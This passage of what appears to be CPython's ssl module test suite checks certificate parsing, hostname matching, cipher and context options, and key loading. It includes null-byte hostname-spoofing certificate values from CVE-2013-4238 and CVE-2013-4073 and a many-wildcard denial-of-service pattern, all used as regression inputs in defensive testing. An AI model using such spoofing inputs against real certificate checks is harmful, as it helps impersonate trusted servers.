self.assertEqual(len(child_random), 16)
os.write(wfd, child_random)
os.close(wfd)
except BaseException:
os._exit(1)
else:
os._exit(0)
else:
os.close(wfd)
self.addCleanup(os.close, rfd)
_, status = os.waitpid(pid, 0)
self.assertEqual(status, 0)
child_random = os.read(rfd, 16)
self.assertEqual(len(child_random), 16)
parent_random = ssl.RAND_pseudo_bytes(16)[0]
self.assertEqual(len(parent_random), 16)
self.assertNotEqual(child_random, parent_random)
def test_parse_cert(self):
# note that this uses an 'unofficial' function in _ssl.c,
# provided solely for this test, to exercise the certificate
# parsing code
p = ssl._ssl._test_decode_cert(CERTFILE)
if support.verbose:
sys.stdout.write("\n" + pprint.pformat(p) + "\n")
self.assertEqual(p['issuer'],
((('countryName', 'XY'),),
(('localityName', 'Castle Anthrax'),),
(('organizationName', 'Python Software Foundation'),),
(('commonName', 'localhost'),))
)
# Note the next three asserts will fail if the keys are regenerated
self.assertEqual(p['notAfter'], asn1time('Oct 5 23:01:56 2020 GMT'))
self.assertEqual(p['notBefore'], asn1time('Oct 8 23:01:56 2010 GMT'))
self.assertEqual(p['serialNumber'], 'D7C7381919AFC24E')
self.assertEqual(p['subject'],
((('countryName', 'XY'),),
(('localityName', 'Castle Anthrax'),),
(('organizationName', 'Python Software Foundation'),),
(('commonName', 'localhost'),))
)
self.assertEqual(p['subjectAltName'], (('DNS', 'localhost'),))
# Issue #13034: the subjectAltName in some certificates
# (notably projects.developer.nokia.com:443) wasn't parsed
p = ssl._ssl._test_decode_cert(NOKIACERT)
if support.verbose:
sys.stdout.write("\n" + pprint.pformat(p) + "\n")
self.assertEqual(p['subjectAltName'],
(('DNS', 'projects.developer.nokia.com'),
('DNS', 'projects.forum.nokia.com'))
)
# extra OCSP and AIA fields
self.assertEqual(p['OCSP'], ('http://ocsp.verisign.com',))
self.assertEqual(p['caIssuers'],
('http://SVRIntl-G3-aia.verisign.com/SVRIntlG3.cer',))
self.assertEqual(p['crlDistributionPoints'],
('http://SVRIntl-G3-crl.verisign.com/SVRIntlG3.crl',))
def test_parse_cert_CVE_2013_4238(self):
p = ssl._ssl._test_decode_cert(NULLBYTECERT)
if support.verbose:
sys.stdout.write("\n" + pprint.pformat(p) + "\n")
subject = ((('countryName', 'US'),),
(('stateOrProvinceName', 'Oregon'),),
(('localityName', 'Beaverton'),),
(('organizationName', 'Python Software Foundation'),),
(('organizationalUnitName', 'Python Core Development'),),
(('commonName', 'null.python.org\x00example.org'),),
(('emailAddress', 'python-dev@python.org'),))
self.assertEqual(p['subject'], subject)
self.assertEqual(p['issuer'], subject)
if ssl._OPENSSL_API_VERSION >= (0, 9, 8):
san = (('DNS', 'altnull.python.org\x00example.com'),
('email', 'null@python.org\x00user@example.org'),
('URI', 'http://null.python.org\x00http://example.org'),
('IP Address', '192.0.2.1'),
('IP Address', '2001:DB8:0:0:0:0:0:1\n'))
else:
# OpenSSL 0.9.7 doesn't support IPv6 addresses in subjectAltName
san = (('DNS', 'altnull.python.org\x00example.com'),
('email', 'null@python.org\x00user@example.org'),
('URI', 'http://null.python.org\x00http://example.org'),
('IP Address', '192.0.2.1'),
('IP Address', '<invalid>'))
self.assertEqual(p['subjectAltName'], san)
def test_parse_all_sans(self):
p = ssl._ssl._test_decode_cert(ALLSANFILE)
self.assertEqual(p['subjectAltName'],
(
('DNS', 'allsans'),
('othername', '<unsupported>'),
('othername', '<unsupported>'),
('email', 'user@example.org'),
('DNS', 'www.example.org'),
('DirName',
((('countryName', 'XY'),),
(('localityName', 'Castle Anthrax'),),
(('organizationName', 'Python Software Foundation'),),
(('commonName', 'dirname example'),))),
('URI', 'https://www.python.org/'),
('IP Address', '127.0.0.1'),
('IP Address', '0:0:0:0:0:0:0:1\n'),
('Registered ID', '1.2.3.4.5')
)
)
def test_DER_to_PEM(self):
with open(CAFILE_CACERT, 'r') as f:
pem = f.read()
d1 = ssl.PEM_cert_to_DER_cert(pem)
p2 = ssl.DER_cert_to_PEM_cert(d1)
d2 = ssl.PEM_cert_to_DER_cert(p2)
self.assertEqual(d1, d2)
if not p2.startswith(ssl.PEM_HEADER + '\n'):
self.fail("DER-to-PEM didn't include correct header:\n%r\n" % p2)
if not p2.endswith('\n' + ssl.PEM_FOOTER + '\n'):
self.fail("DER-to-PEM didn't include correct footer:\n%r\n" % p2)
def test_openssl_version(self):
n = ssl.OPENSSL_VERSION_NUMBER
t = ssl.OPENSSL_VERSION_INFO
s = ssl.OPENSSL_VERSION
self.assertIsInstance(n, int)
self.assertIsInstance(t, tuple)
self.assertIsInstance(s, str)
# Some sanity checks follow
# >= 0.9
self.assertGreaterEqual(n, 0x900000)
# < 3.0
self.assertLess(n, 0x30000000)
major, minor, fix, patch, status = t
self.assertGreaterEqual(major, 0)
self.assertLess(major, 3)
self.assertGreaterEqual(minor, 0)
self.assertLess(minor, 256)
self.assertGreaterEqual(fix, 0)
self.assertLess(fix, 256)
self.assertGreaterEqual(patch, 0)
self.assertLessEqual(patch, 63)
self.assertGreaterEqual(status, 0)
self.assertLessEqual(status, 15)
# Version string as returned by {Open,Libre}SSL, the format might change
if IS_LIBRESSL:
self.assertTrue(s.startswith("LibreSSL {:d}".format(major)),
(s, t, hex(n)))
else:
self.assertTrue(s.startswith("OpenSSL {:d}.{:d}.{:d}".format(major, minor, fix)),
(s, t, hex(n)))
@support.cpython_only
def test_refcycle(self):
# Issue #7943: an SSL object doesn't create reference cycles with
# itself.
s = socket.socket(socket.AF_INET)
ss = test_wrap_socket(s)
wr = weakref.ref(ss)
with support.check_warnings(("", ResourceWarning)):
del ss
self.assertEqual(wr(), None)
def test_wrapped_unconnected(self):
# Methods on an unconnected SSLSocket propagate the original
# OSError raise by the underlying socket object.
s = socket.socket(socket.AF_INET)
with test_wrap_socket(s) as ss:
self.assertRaises(OSError, ss.recv, 1)
self.assertRaises(OSError, ss.recv_into, bytearray(b'x'))
self.assertRaises(OSError, ss.recvfrom, 1)
self.assertRaises(OSError, ss.recvfrom_into, bytearray(b'x'), 1)
self.assertRaises(OSError, ss.send, b'x')
self.assertRaises(OSError, ss.sendto, b'x', ('0.0.0.0', 0))
def test_timeout(self):
# Issue #8524: when creating an SSL socket, the timeout of the
# original socket should be retained.
for timeout in (None, 0.0, 5.0):
s = socket.socket(socket.AF_INET)
s.settimeout(timeout)
with test_wrap_socket(s) as ss:
self.assertEqual(timeout, ss.gettimeout())
def test_errors_sslwrap(self):
sock = socket.socket()
self.assertRaisesRegex(ValueError,
"certfile must be specified",
ssl.wrap_socket, sock, keyfile=CERTFILE)
self.assertRaisesRegex(ValueError,
"certfile must be specified for server-side operations",
ssl.wrap_socket, sock, server_side=True)
self.assertRaisesRegex(ValueError,
"certfile must be specified for server-side operations",
ssl.wrap_socket, sock, server_side=True, certfile="")
with ssl.wrap_socket(sock, server_side=True, certfile=CERTFILE) as s:
self.assertRaisesRegex(ValueError, "can't connect in server-side mode",
s.connect, (HOST, 8080))
with self.assertRaises(OSError) as cm:
with socket.socket() as sock:
ssl.wrap_socket(sock, certfile=NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaises(OSError) as cm:
with socket.socket() as sock:
ssl.wrap_socket(sock,
certfile=CERTFILE, keyfile=NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaises(OSError) as cm:
with socket.socket() as sock:
ssl.wrap_socket(sock,
certfile=NONEXISTINGCERT, keyfile=NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
def bad_cert_test(self, certfile):
"""Check that trying to use the given client certificate fails"""
certfile = os.path.join(os.path.dirname(__file__) or os.curdir,
certfile)
sock = socket.socket()
self.addCleanup(sock.close)
with self.assertRaises(ssl.SSLError):
test_wrap_socket(sock,
certfile=certfile,
ssl_version=ssl.PROTOCOL_TLSv1)
def test_empty_cert(self):
"""Wrapping with an empty cert file"""
self.bad_cert_test("nullcert.pem")
def test_malformed_cert(self):
"""Wrapping with a badly formatted certificate (syntax error)"""
self.bad_cert_test("badcert.pem")
def test_malformed_key(self):
"""Wrapping with a badly formatted key (syntax error)"""
self.bad_cert_test("badkey.pem")
def test_match_hostname(self):
def ok(cert, hostname):
ssl.match_hostname(cert, hostname)
def fail(cert, hostname):
self.assertRaises(ssl.CertificateError,
ssl.match_hostname, cert, hostname)
# -- Hostname matching --
cert = {'subject': ((('commonName', 'example.com'),),)}
ok(cert, 'example.com')
ok(cert, 'ExAmple.cOm')
fail(cert, 'www.example.com')
fail(cert, '.example.com')
fail(cert, 'example.org')
fail(cert, 'exampleXcom')
cert = {'subject': ((('commonName', '*.a.com'),),)}
ok(cert, 'foo.a.com')
fail(cert, 'bar.foo.a.com')
fail(cert, 'a.com')
fail(cert, 'Xa.com')
fail(cert, '.a.com')
# only match one left-most wildcard
cert = {'subject': ((('commonName', 'f*.com'),),)}
ok(cert, 'foo.com')
ok(cert, 'f.com')
fail(cert, 'bar.com')
fail(cert, 'foo.a.com')
fail(cert, 'bar.foo.com')
# NULL bytes are bad, CVE-2013-4073
cert = {'subject': ((('commonName',
'null.python.org\x00example.org'),),)}
ok(cert, 'null.python.org\x00example.org') # or raise an error?
fail(cert, 'example.org')
fail(cert, 'null.python.org')
# error cases with wildcards
cert = {'subject': ((('commonName', '*.*.a.com'),),)}
fail(cert, 'bar.foo.a.com')
fail(cert, 'a.com')
fail(cert, 'Xa.com')
fail(cert, '.a.com')
cert = {'subject': ((('commonName', 'a.*.com'),),)}
fail(cert, 'a.foo.com')
fail(cert, 'a..com')
fail(cert, 'a.com')
# wildcard doesn't match IDNA prefix 'xn--'
idna = 'püthon.python.org'.encode("idna").decode("ascii")
cert = {'subject': ((('commonName', idna),),)}
ok(cert, idna)
cert = {'subject': ((('commonName', 'x*.python.org'),),)}
fail(cert, idna)
cert = {'subject': ((('commonName', 'xn--p*.python.org'),),)}
fail(cert, idna)
# wildcard in first fragment and IDNA A-labels in sequent fragments
# are supported.
idna = 'www*.pythön.org'.encode("idna").decode("ascii")
cert = {'subject': ((('commonName', idna),),)}
ok(cert, 'www.pythön.org'.encode("idna").decode("ascii"))
ok(cert, 'www1.pythön.org'.encode("idna").decode("ascii"))
fail(cert, 'ftp.pythön.org'.encode("idna").decode("ascii"))
fail(cert, 'pythön.org'.encode("idna").decode("ascii"))
# Slightly fake real-world example
cert = {'notAfter': 'Jun 26 21:41:46 2011 GMT',
'subject': ((('commonName', 'linuxfrz.org'),),),
'subjectAltName': (('DNS', 'linuxfr.org'),
('DNS', 'linuxfr.com'),
('othername', '<unsupported>'))}
ok(cert, 'linuxfr.org')
ok(cert, 'linuxfr.com')
# Not a "DNS" entry
fail(cert, '<unsupported>')
# When there is a subjectAltName, commonName isn't used
fail(cert, 'linuxfrz.org')
# A pristine real-world example
cert = {'notAfter': 'Dec 18 23:59:59 2011 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('organizationName', 'Google Inc'),),
(('commonName', 'mail.google.com'),))}
ok(cert, 'mail.google.com')
fail(cert, 'gmail.com')
# Only commonName is considered
fail(cert, 'California')
# -- IPv4 matching --
cert = {'subject': ((('commonName', 'example.com'),),),
'subjectAltName': (('DNS', 'example.com'),
('IP Address', '10.11.12.13'),
('IP Address', '14.15.16.17'))}
ok(cert, '10.11.12.13')
ok(cert, '14.15.16.17')
fail(cert, '14.15.16.18')
fail(cert, 'example.net')
# -- IPv6 matching --
cert = {'subject': ((('commonName', 'example.com'),),),
'subjectAltName': (('DNS', 'example.com'),
('IP Address', '2001:0:0:0:0:0:0:CAFE\n'),
('IP Address', '2003:0:0:0:0:0:0:BABA\n'))}
ok(cert, '2001::cafe')
ok(cert, '2003::baba')
fail(cert, '2003::bebe')
fail(cert, 'example.net')
# -- Miscellaneous --
# Neither commonName nor subjectAltName
cert = {'notAfter': 'Dec 18 23:59:59 2011 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('organizationName', 'Google Inc'),))}
fail(cert, 'mail.google.com')
# No DNS entry in subjectAltName but a commonName
cert = {'notAfter': 'Dec 18 23:59:59 2099 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('commonName', 'mail.google.com'),)),
'subjectAltName': (('othername', 'blabla'), )}
ok(cert, 'mail.google.com')
# No DNS entry subjectAltName and no commonName
cert = {'notAfter': 'Dec 18 23:59:59 2099 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('organizationName', 'Google Inc'),)),
'subjectAltName': (('othername', 'blabla'),)}
fail(cert, 'google.com')
# Empty cert / no cert
self.assertRaises(ValueError, ssl.match_hostname, None, 'example.com')
self.assertRaises(ValueError, ssl.match_hostname, {}, 'example.com')
# Issue #17980: avoid denials of service by refusing more than one
# wildcard per fragment.
cert = {'subject': ((('commonName', 'a*b.com'),),)}
ok(cert, 'axxb.com')
cert = {'subject': ((('commonName', 'a*b.co*'),),)}
fail(cert, 'axxb.com')
cert = {'subject': ((('commonName', 'a*b*.com'),),)}
with self.assertRaises(ssl.CertificateError) as cm:
ssl.match_hostname(cert, 'axxbxxc.com')
self.assertIn("too many wildcards", str(cm.exception))
def test_server_side(self):
# server_hostname doesn't work for server sockets
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
with socket.socket() as sock:
self.assertRaises(ValueError, ctx.wrap_socket, sock, True,
server_hostname="some.hostname")
def test_unknown_channel_binding(self):
# should raise ValueError for unknown type
s = socket.socket(socket.AF_INET)
s.bind(('127.0.0.1', 0))
s.listen()
c = socket.socket(socket.AF_INET)
c.connect(s.getsockname())
with test_wrap_socket(c, do_handshake_on_connect=False) as ss:
with self.assertRaises(ValueError):
ss.get_channel_binding("unknown-type")
s.close()
@unittest.skipUnless("tls-unique" in ssl.CHANNEL_BINDING_TYPES,
"'tls-unique' channel binding not available")
def test_tls_unique_channel_binding(self):
# unconnected should return None for known type
s = socket.socket(socket.AF_INET)
with test_wrap_socket(s) as ss:
self.assertIsNone(ss.get_channel_binding("tls-unique"))
# the same for server-side
s = socket.socket(socket.AF_INET)
with test_wrap_socket(s, server_side=True, certfile=CERTFILE) as ss:
self.assertIsNone(ss.get_channel_binding("tls-unique"))
def test_dealloc_warn(self):
ss = test_wrap_socket(socket.socket(socket.AF_INET))
r = repr(ss)
with self.assertWarns(ResourceWarning) as cm:
ss = None
support.gc_collect()
self.assertIn(r, str(cm.warning.args[0]))
def test_get_default_verify_paths(self):
paths = ssl.get_default_verify_paths()
self.assertEqual(len(paths), 6)
self.assertIsInstance(paths, ssl.DefaultVerifyPaths)
with support.EnvironmentVarGuard() as env:
env["SSL_CERT_DIR"] = CAPATH
env["SSL_CERT_FILE"] = CERTFILE
paths = ssl.get_default_verify_paths()
self.assertEqual(paths.cafile, CERTFILE)
self.assertEqual(paths.capath, CAPATH)
@unittest.skipUnless(sys.platform == "win32", "Windows specific")
def test_enum_certificates(self):
self.assertTrue(ssl.enum_certificates("CA"))
self.assertTrue(ssl.enum_certificates("ROOT"))
self.assertRaises(TypeError, ssl.enum_certificates)
self.assertRaises(WindowsError, ssl.enum_certificates, "")
trust_oids = set()
for storename in ("CA", "ROOT"):
store = ssl.enum_certificates(storename)
self.assertIsInstance(store, list)
for element in store:
self.assertIsInstance(element, tuple)
self.assertEqual(len(element), 3)
cert, enc, trust = element
self.assertIsInstance(cert, bytes)
self.assertIn(enc, {"x509_asn", "pkcs_7_asn"})
self.assertIsInstance(trust, (set, bool))
if isinstance(trust, set):
trust_oids.update(trust)
serverAuth = "1.3.6.1.5.5.7.3.1"
self.assertIn(serverAuth, trust_oids)
@unittest.skipUnless(sys.platform == "win32", "Windows specific")
def test_enum_crls(self):
self.assertTrue(ssl.enum_crls("CA"))
self.assertRaises(TypeError, ssl.enum_crls)
self.assertRaises(WindowsError, ssl.enum_crls, "")
crls = ssl.enum_crls("CA")
self.assertIsInstance(crls, list)
for element in crls:
self.assertIsInstance(element, tuple)
self.assertEqual(len(element), 2)
self.assertIsInstance(element[0], bytes)
self.assertIn(element[1], {"x509_asn", "pkcs_7_asn"})
def test_asn1object(self):
expected = (129, 'serverAuth', 'TLS Web Server Authentication',
'1.3.6.1.5.5.7.3.1')
val = ssl._ASN1Object('1.3.6.1.5.5.7.3.1')
self.assertEqual(val, expected)
self.assertEqual(val.nid, 129)
self.assertEqual(val.shortname, 'serverAuth')
self.assertEqual(val.longname, 'TLS Web Server Authentication')
self.assertEqual(val.oid, '1.3.6.1.5.5.7.3.1')
self.assertIsInstance(val, ssl._ASN1Object)
self.assertRaises(ValueError, ssl._ASN1Object, 'serverAuth')
val = ssl._ASN1Object.fromnid(129)
self.assertEqual(val, expected)
self.assertIsInstance(val, ssl._ASN1Object)
self.assertRaises(ValueError, ssl._ASN1Object.fromnid, -1)
with self.assertRaisesRegex(ValueError, "unknown NID 100000"):
ssl._ASN1Object.fromnid(100000)
for i in range(1000):
try:
obj = ssl._ASN1Object.fromnid(i)
except ValueError:
pass
else:
self.assertIsInstance(obj.nid, int)
self.assertIsInstance(obj.shortname, str)
self.assertIsInstance(obj.longname, str)
self.assertIsInstance(obj.oid, (str, type(None)))
val = ssl._ASN1Object.fromname('TLS Web Server Authentication')
self.assertEqual(val, expected)
self.assertIsInstance(val, ssl._ASN1Object)
self.assertEqual(ssl._ASN1Object.fromname('serverAuth'), expected)
self.assertEqual(ssl._ASN1Object.fromname('1.3.6.1.5.5.7.3.1'),
expected)
with self.assertRaisesRegex(ValueError, "unknown object 'serverauth'"):
ssl._ASN1Object.fromname('serverauth')
def test_purpose_enum(self):
val = ssl._ASN1Object('1.3.6.1.5.5.7.3.1')
self.assertIsInstance(ssl.Purpose.SERVER_AUTH, ssl._ASN1Object)
self.assertEqual(ssl.Purpose.SERVER_AUTH, val)
self.assertEqual(ssl.Purpose.SERVER_AUTH.nid, 129)
self.assertEqual(ssl.Purpose.SERVER_AUTH.shortname, 'serverAuth')
self.assertEqual(ssl.Purpose.SERVER_AUTH.oid,
'1.3.6.1.5.5.7.3.1')
val = ssl._ASN1Object('1.3.6.1.5.5.7.3.2')
self.assertIsInstance(ssl.Purpose.CLIENT_AUTH, ssl._ASN1Object)
self.assertEqual(ssl.Purpose.CLIENT_AUTH, val)
self.assertEqual(ssl.Purpose.CLIENT_AUTH.nid, 130)
self.assertEqual(ssl.Purpose.CLIENT_AUTH.shortname, 'clientAuth')
self.assertEqual(ssl.Purpose.CLIENT_AUTH.oid,
'1.3.6.1.5.5.7.3.2')
def test_unsupported_dtls(self):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.addCleanup(s.close)
with self.assertRaises(NotImplementedError) as cx:
test_wrap_socket(s, cert_reqs=ssl.CERT_NONE)
self.assertEqual(str(cx.exception), "only stream sockets are supported")
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
with self.assertRaises(NotImplementedError) as cx:
ctx.wrap_socket(s)
self.assertEqual(str(cx.exception), "only stream sockets are supported")
def cert_time_ok(self, timestring, timestamp):
self.assertEqual(ssl.cert_time_to_seconds(timestring), timestamp)
def cert_time_fail(self, timestring):
with self.assertRaises(ValueError):
ssl.cert_time_to_seconds(timestring)
@unittest.skipUnless(utc_offset(),
'local time needs to be different from UTC')
def test_cert_time_to_seconds_timezone(self):
# Issue #19940: ssl.cert_time_to_seconds() returns wrong
# results if local timezone is not UTC
self.cert_time_ok("May 9 00:00:00 2007 GMT", 1178668800.0)
self.cert_time_ok("Jan 5 09:34:43 2018 GMT", 1515144883.0)
def test_cert_time_to_seconds(self):
timestring = "Jan 5 09:34:43 2018 GMT"
ts = 1515144883.0
self.cert_time_ok(timestring, ts)
# accept keyword parameter, assert its name
self.assertEqual(ssl.cert_time_to_seconds(cert_time=timestring), ts)
# accept both %e and %d (space or zero generated by strftime)
self.cert_time_ok("Jan 05 09:34:43 2018 GMT", ts)
# case-insensitive
self.cert_time_ok("JaN 5 09:34:43 2018 GmT", ts)
self.cert_time_fail("Jan 5 09:34 2018 GMT") # no seconds
self.cert_time_fail("Jan 5 09:34:43 2018") # no GMT
self.cert_time_fail("Jan 5 09:34:43 2018 UTC") # not GMT timezone
self.cert_time_fail("Jan 35 09:34:43 2018 GMT") # invalid day
self.cert_time_fail("Jon 5 09:34:43 2018 GMT") # invalid month
self.cert_time_fail("Jan 5 24:00:00 2018 GMT") # invalid hour
self.cert_time_fail("Jan 5 09:60:43 2018 GMT") # invalid minute
newyear_ts = 1230768000.0
# leap seconds
self.cert_time_ok("Dec 31 23:59:60 2008 GMT", newyear_ts)
# same timestamp
self.cert_time_ok("Jan 1 00:00:00 2009 GMT", newyear_ts)
self.cert_time_ok("Jan 5 09:34:59 2018 GMT", 1515144899)
# allow 60th second (even if it is not a leap second)
self.cert_time_ok("Jan 5 09:34:60 2018 GMT", 1515144900)
# allow 2nd leap second for compatibility with time.strptime()
self.cert_time_ok("Jan 5 09:34:61 2018 GMT", 1515144901)
self.cert_time_fail("Jan 5 09:34:62 2018 GMT") # invalid seconds
# no special treatement for the special value:
# 99991231235959Z (rfc 5280)
self.cert_time_ok("Dec 31 23:59:59 9999 GMT", 253402300799.0)
@support.run_with_locale('LC_ALL', '')
def test_cert_time_to_seconds_locale(self):
# `cert_time_to_seconds()` should be locale independent
def local_february_name():
return time.strftime('%b', (1, 2, 3, 4, 5, 6, 0, 0, 0))
if local_february_name().lower() == 'feb':
self.skipTest("locale-specific month name needs to be "
"different from C locale")
# locale-independent
self.cert_time_ok("Feb 9 00:00:00 2007 GMT", 1170979200.0)
self.cert_time_fail(local_february_name() + " 9 00:00:00 2007 GMT")
def test_connect_ex_error(self):
server = socket.socket(socket.AF_INET)
self.addCleanup(server.close)
port = support.bind_port(server) # Reserve port but don't listen
s = test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED)
self.addCleanup(s.close)
rc = s.connect_ex((HOST, port))
# Issue #19919: Windows machines or VMs hosted on Windows
# machines sometimes return EWOULDBLOCK.
errors = (
errno.ECONNREFUSED, errno.EHOSTUNREACH, errno.ETIMEDOUT,
errno.EWOULDBLOCK,
)
self.assertIn(rc, errors)
class ContextTests(unittest.TestCase):
@skip_if_broken_ubuntu_ssl
def test_constructor(self):
for protocol in PROTOCOLS:
ssl.SSLContext(protocol)
ctx = ssl.SSLContext()
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLS)
self.assertRaises(ValueError, ssl.SSLContext, -1)
self.assertRaises(ValueError, ssl.SSLContext, 42)
@skip_if_broken_ubuntu_ssl
def test_protocol(self):
for proto in PROTOCOLS:
ctx = ssl.SSLContext(proto)
self.assertEqual(ctx.protocol, proto)
def test_ciphers(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.set_ciphers("ALL")
ctx.set_ciphers("DEFAULT")
with self.assertRaisesRegex(ssl.SSLError, "No cipher can be selected"):
ctx.set_ciphers("^$:,;?*'dorothyx")
@unittest.skipIf(ssl.OPENSSL_VERSION_INFO < (1, 0, 2, 0, 0), 'OpenSSL too old')
def test_get_ciphers(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.set_ciphers('AESGCM')
names = set(d['name'] for d in ctx.get_ciphers())
self.assertIn('AES256-GCM-SHA384', names)
self.assertIn('AES128-GCM-SHA256', names)
@skip_if_broken_ubuntu_ssl
def test_options(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
# OP_ALL | OP_NO_SSLv2 | OP_NO_SSLv3 is the default value
default = (ssl.OP_ALL | ssl.OP_NO_SSLv2 | ssl.OP_NO_SSLv3)
# SSLContext also enables these by default
default |= (OP_NO_COMPRESSION | OP_CIPHER_SERVER_PREFERENCE |
OP_SINGLE_DH_USE | OP_SINGLE_ECDH_USE)
self.assertEqual(default, ctx.options)
ctx.options |= ssl.OP_NO_TLSv1
self.assertEqual(default | ssl.OP_NO_TLSv1, ctx.options)
if can_clear_options():
ctx.options = (ctx.options & ~ssl.OP_NO_TLSv1)
self.assertEqual(default, ctx.options)
ctx.options = 0
# Ubuntu has OP_NO_SSLv3 forced on by default
self.assertEqual(0, ctx.options & ~ssl.OP_NO_SSLv3)
else:
with self.assertRaises(ValueError):
ctx.options = 0
def test_verify_mode(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
# Default value
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
ctx.verify_mode = ssl.CERT_OPTIONAL
self.assertEqual(ctx.verify_mode, ssl.CERT_OPTIONAL)
ctx.verify_mode = ssl.CERT_REQUIRED
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
ctx.verify_mode = ssl.CERT_NONE
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
with self.assertRaises(TypeError):
ctx.verify_mode = None
with self.assertRaises(ValueError):
ctx.verify_mode = 42
@unittest.skipUnless(have_verify_flags(),
"verify_flags need OpenSSL > 0.9.8")
def test_verify_flags(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
# default value
tf = getattr(ssl, "VERIFY_X509_TRUSTED_FIRST", 0)
self.assertEqual(ctx.verify_flags, ssl.VERIFY_DEFAULT | tf)
ctx.verify_flags = ssl.VERIFY_CRL_CHECK_LEAF
self.assertEqual(ctx.verify_flags, ssl.VERIFY_CRL_CHECK_LEAF)
ctx.verify_flags = ssl.VERIFY_CRL_CHECK_CHAIN
self.assertEqual(ctx.verify_flags, ssl.VERIFY_CRL_CHECK_CHAIN)
ctx.verify_flags = ssl.VERIFY_DEFAULT
self.assertEqual(ctx.verify_flags, ssl.VERIFY_DEFAULT)
# supports any value
ctx.verify_flags = ssl.VERIFY_CRL_CHECK_LEAF | ssl.VERIFY_X509_STRICT
self.assertEqual(ctx.verify_flags,
ssl.VERIFY_CRL_CHECK_LEAF | ssl.VERIFY_X509_STRICT)
with self.assertRaises(TypeError):
ctx.verify_flags = None
def test_load_cert_chain(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
# Combined key and cert in a single file
ctx.load_cert_chain(CERTFILE, keyfile=None)
ctx.load_cert_chain(CERTFILE, keyfile=CERTFILE)
self.assertRaises(TypeError, ctx.load_cert_chain, keyfile=CERTFILE)
with self.assertRaises(OSError) as cm:
ctx.load_cert_chain(NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(BADCERT)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(EMPTYCERT)
# Separate key and cert
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_cert_chain(ONLYCERT, ONLYKEY)
ctx.load_cert_chain(certfile=ONLYCERT, keyfile=ONLYKEY)
ctx.load_cert_chain(certfile=BYTES_ONLYCERT, keyfile=BYTES_ONLYKEY)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(ONLYCERT)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(ONLYKEY)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(certfile=ONLYKEY, keyfile=ONLYCERT)
# Mismatching key and cert
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
with self.assertRaisesRegex(ssl.SSLError, "key values mismatch"):
ctx.load_cert_chain(CAFILE_CACERT, ONLYKEY)
# Password protected key and cert
ctx.load_cert_chain(CERTFILE_PROTECTED, password=KEY_PASSWORD)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=KEY_PASSWORD.encode())
ctx.load_cert_chain(CERTFILE_PROTECTED,
password=bytearray(KEY_PASSWORD.encode()))
ctx.load_cert_chain(ONLYCERT, ONLYKEY_PROTECTED, KEY_PASSWORD)
ctx.load_cert_chain(ONLYCERT, ONLYKEY_PROTECTED, KEY_PASSWORD.encode())
ctx.load_cert_chain(ONLYCERT, ONLYKEY_PROTECTED,
bytearray(KEY_PASSWORD.encode()))
with self.assertRaisesRegex(TypeError, "should be a string"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=True)
with self.assertRaises(ssl.SSLError):
ctx.load_cert_chain(CERTFILE_PROTECTED, password="badpass")
with self.assertRaisesRegex(ValueError, "cannot be longer"):
# openssl has a fixed limit on the password buffer.
# PEM_BUFSIZE is generally set to 1kb.
# Return a string larger than this.
ctx.load_cert_chain(CERTFILE_PROTECTED, password=b'a' * 102400)
# Password callback
def getpass_unicode():
return KEY_PASSWORD
def getpass_bytes():
return KEY_PASSWORD.encode()
def getpass_bytearray():
return bytearray(KEY_PASSWORD.encode())
def getpass_badpass():
return "badpass"
def getpass_huge():
return b'a' * (1024 * 1024)
def getpass_bad_type():
return 9
def getpass_exception():
raise Exception('getpass error')
class GetPassCallable:
def __call__(self):
return KEY_PASSWORD
def getpass(self):
return KEY_PASSWORD
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_unicode)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_bytes)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_bytearray)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=GetPassCallable())
ctx.load_cert_chain(CERTFILE_PROTECTED,
password=GetPassCallable().getpass)
with self.assertRaises(ssl.SSLError):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_badpass)
with self.assertRaisesRegex(ValueError, "cannot be longer"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_huge)
with self.assertRaisesRegex(TypeError, "must return a string"):
